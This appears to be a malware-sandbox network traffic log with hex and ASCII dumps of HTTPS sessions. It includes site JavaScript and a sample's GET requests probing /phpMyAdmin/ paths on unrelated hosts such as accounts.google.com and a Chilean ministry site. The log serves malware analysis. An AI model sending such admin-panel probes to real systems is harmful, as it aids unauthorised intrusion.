                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 6e 28 22 22 29 29 2c 61 5b 74 5d 2e 61 70 70 6c 79 28 63 6f 6e 73 6f 6c 65 2c 72 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 65 2e 67 65 74 43 6f 6e 73 6f 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 22 67 65 74 43 6f 6e 73 6f 6c 65 20 6e 65 65 64 20 61 20 74 61 67 20 6e 61 6d 65 20 28 73 74 72 69 6e 67 29 22 3b 69 66 28 2d 31 3d 3d 3d 75 2e 61 76 61 69 6c 61 62 6c 65 2e 69 6e 64 65 78 4f 66 28 65 29 26 26 66 75 6e 63 74 69 6f 6e 28 65 29 7b 75 2e 61 76 61 69 6c 61 62 6c 65 2e 70 75 73 68 28 65 29 3b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 74 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: n("")),a[t].apply(console,r)}:function(){}};e.getConsole=function(e){if("string"!=typeof e)throw"getConsole need a tag name (string)";if(-1===u.available.indexOf(e)&&function(e){u.available.push(e);var t=document.createEvent("CustomEvent");t.initCustomEve
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 71 76 63 60 38 33 39 79 3a 31 21 75 66 79 75 2e 62 65 21 75 66 79 75 42 65 21 4d 6a 68 62 75 76 74 21 75 66 79 75 60 62 65 21 75 66 79 75 60 62 65 74 21 75 66 79 75 2e 62 65 74 21 75 66 79 75 2e 62 65 2e 6d 6a 6f 6c 74 22 2c 65 76 65 6e 74 3a 7b 63 61 74 65 67 6f 72 79 3a 22 70 62 74 60 6d 70 62 65 66 65 22 2c 61 63 74 69 6f 6e 3a 22 67 62 6a 6d 22 7d 7d 2c 6e 3d 65 2e 67 65 74 43 6f 6e 73 6f 6c 65 28 22 69 6e 4f 62 73 22 29 2c 6f 3d 30 2c 72 3d 7b 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 7c 7c 31 2c 65 2e 73 70 6c 69 74 28 22 22 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 29 2b 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: qvc`839y:1!ufyu.be!ufyuBe!Mjhbuvt!ufyu`be!ufyu`bet!ufyu.bet!ufyu.be.mjolt",event:{category:"pbt`mpbefe",action:"gbjm"}},n=e.getConsole("inObs"),o=0,r={},s=function(e,t){return t=t||1,e.split("").map((function(e){return String.fromCharCode(e.charCodeAt()+t
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 63 74 69 6f 6e 28 74 29 7b 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 73 74 79 6c 65 22 3d 3d 3d 74 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 26 26 28 63 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 22 6e 6f 6e 65 22 3d 3d 3d 74 2e 74 61 72 67 65 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 26 26 21 65 2e 63 61 6c 6c 65 64 26 26 28 65 2e 63 61 6c 6c 65 64 3d 31 29 26 26 65 2e 63 61 6c 6c 28 72 2c 31 29 29 7d 29 29 7d 29 29 2c 75 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 69 66 28 22 63 68 69 6c 64 4c 69 73 74 22 3d 3d 3d 74 2e 74 79 70 65 26 26 22 48 54 4d 4c 22 3d 3d 3d 74 2e 74 61 72 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ction(t){t.forEach((function(t){"style"===t.attributeName&&(c.disconnect(),"none"===t.target.style.display&&!e.called&&(e.called=1)&&e.call(r,1))}))})),u=new MutationObserver((function(t){t.forEach((function(t){try{if("childList"===t.type&&"HTML"===t.targ
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 6e 2e 77 61 72 6e 28 22 4d 69 73 73 69 6e 67 20 73 63 72 69 70 74 22 2c 66 2e 73 72 63 29 2c 21 63 26 26 6c 26 26 2d 31 21 3d 3d 74 2e 64 6f 6d 61 69 6e 73 2e 69 6e 64 65 78 4f 66 28 73 28 6c 29 29 26 26 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2d 67 2e 67 65 74 54 69 6d 65 28 29 3c 31 35 30 30 26 26 28 6e 2e 77 61 72 6e 28 22 49 6e 74 65 67 72 69 74 79 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 6e 20 22 2c 66 2e 73 72 63 2c 22 20 6e 6f 74 20 6f 62 73 65 72 76 69 6e 67 20 61 6e 79 6d 6f 72 65 20 21 22 29 2c 75 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 63 3d 31 2c 65 28 31 29 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 68 26 26 68 2e 61 70 70 6c 79 28 74 68 69 73 2c 41 72 72 61 79 2e 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nction(){try{n.warn("Missing script",f.src),!c&&l&&-1!==t.domains.indexOf(s(l))&&(new Date).getTime()-g.getTime()<1500&&(n.warn("Integrity violation on ",f.src," not observing anymore !"),u.disconnect(),c=1,e(1)),"function"==typeof h&&h.apply(this,Array.p
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 45 76 65 6e 74 3f 6e 3d 6e 65 77 20 45 76 65 6e 74 28 65 29 3a 28 6e 3d 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 45 76 65 6e 74 22 29 29 2e 69 6e 69 74 45 76 65 6e 74 28 65 2c 30 2c 30 29 2c 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 29 7d 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 2e 73 74 61 74 65 2b 2b 2c 66 2e 73 74 61 74 65 3d 3d 3d 69 2e 6c 65 6e 67 74 68 26 26 28 65 2e 5f 67 74 6d 2e 73 74 61 74 65 3d 22 6c 6f 61 64 65 64 22 2c 75 28 22 67 74 6d 2e 6c 6f 61 64 65 64 22 29 29 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 67 74 6d 2e 73 74 61 74 65 3d 22 65 72 72 6f 72 22 2c 75 28 22 67 74 6d 2e 65 72 72 6f 72 22 29 2c 6c 2e 63 6c 65 61 72 57 6f 72 6b 73 70 61 63 65 73 49 6e 66 6f 28 74 68 69 73 29 7d 3b 66 2e 73 74 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Event?n=new Event(e):(n=t.createEvent("Event")).initEvent(e,0,0),t.dispatchEvent(n)}},f=function(){f.state++,f.state===i.length&&(e._gtm.state="loaded",u("gtm.loaded"))},d=function(){e._gtm.state="error",u("gtm.error"),l.clearWorkspacesInfo(this)};f.state
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 2c 67 65 74 49 6e 66 6f 46 72 6f 6d 51 75 65 72 79 73 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 28 65 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 6f 3d 74 5b 6e 5d 2e 73 70 6c 69 74 28 22 3d 22 29 3b 69 66 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 5b 30 5d 29 3d 3d 3d 74 68 69 73 2e 69 6e 66 6f 4b 65 79 29 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 73 65 57 6f 72 6b 73 70 61 63 65 73 49 6e 66 6f 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 5b 31 5d 29 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 67 65 74 49 6e 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,getInfoFromQuerystring:function(){for(var t=(e.location.search||"").substring(1).split("&"),n=0;n<t.length;n++){var o=t[n].split("=");if(decodeURIComponent(o[0])===this.infoKey)return this.parseWorkspacesInfo(decodeURIComponent(o[1]))}return null},getInf
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 41 53 5f 41 44 5f 42 55 46 46 45 52 3d 5b 5d 2c 4f 41 53 5f 41 44 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 41 53 5f 41 44 5f 42 55 46 46 45 52 2e 70 75 73 68 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 45 76 65 6e 74 26 26 65 2e 5f 67 74 6d 2e 65 72 72 6f 72 73 2e 70 75 73 68 28 7b 6d 65 73 73 61 67 65 3a 74 2e 6d 65 73 73 61 67 65 2c 73 74 61 63 6b 3a 74 2e 65 72 72 6f 72 3f 74 2e 65 72 72 6f 72 2e 73 74 61 63 6b 3a 76 6f 69 64 20 30 2c 6e 61 6d 65 3a 74 2e 65 72 72 6f 72 3f 74 2e 65 72 72 6f 72 2e 6e 61 6d 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: AS_AD_BUFFER=[],OAS_AD=function(){OAS_AD_BUFFER.push(Array.prototype.slice.call(arguments))},function(e){"use strict";function t(t){t instanceof ErrorEvent&&e._gtm.errors.push({message:t.message,stack:t.error?t.error.stack:void 0,name:t.error?t.error.name
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 74 2c 61 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 7d 65 6c 73 65 20 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 35 29 3b 72 65 74 75 72 6e 21 72 7d 28 29 2c 6e 2e 5f 5f 74 63 66 61 70 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6e 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 72 3d 30 3b 72 3c 74 3b 72 2b 2b 29 6e 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 69 66 28 21 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 61 3b 69 66 28 22 73 65 74 47 64 70 72 41 70 70 6c 69 65 73 22 3d 3d 3d 6e 5b 30 5d 29 6e 2e 6c 65 6e 67 74 68 3e 33 26 26 32 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 5b 31 5d 2c 31 30 29 26 26 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t,a.body.appendChild(i)}else setTimeout(e,5);return!r}(),n.__tcfapi=function(){for(var e,t=arguments.length,n=new Array(t),r=0;r<t;r++)n[r]=arguments[r];if(!n.length)return a;if("setGdprApplies"===n[0])n.length>3&&2===parseInt(n[1],10)&&"boolean"==typeof


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                169192.168.2.66369531.216.144.5443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC157OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC969INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2689
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: geoip=RO
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC2689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                170192.168.2.663115142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 76 4e 37 6e 57 5a 58 69 79 66 55 61 4e 45 59 43 35 74 53 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9vN7nWZXiyfUaNEYC5tSKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                171192.168.2.663758163.247.44.239443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC186OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC240INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                location: http://mitextoescolar.mineduc.cl/phpMyAdmin
                                                                                                                                                                                                                                                                                                                                                                content-length: 251
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC251INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 69 74 65 78 74 6f 65 73 63 6f 6c 61 72 2e 6d 69 6e 65 64 75 63 2e 63 6c 2f 70 68 70 4d 79 41 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://mitextoescolar.mineduc.cl/phpMyAdmin">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                172192.168.2.663409142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 77 48 39 32 79 51 79 4e 53 4a 66 52 78 76 62 76 65 58 58 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xwH92yQyNSJfRxvbveXXzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
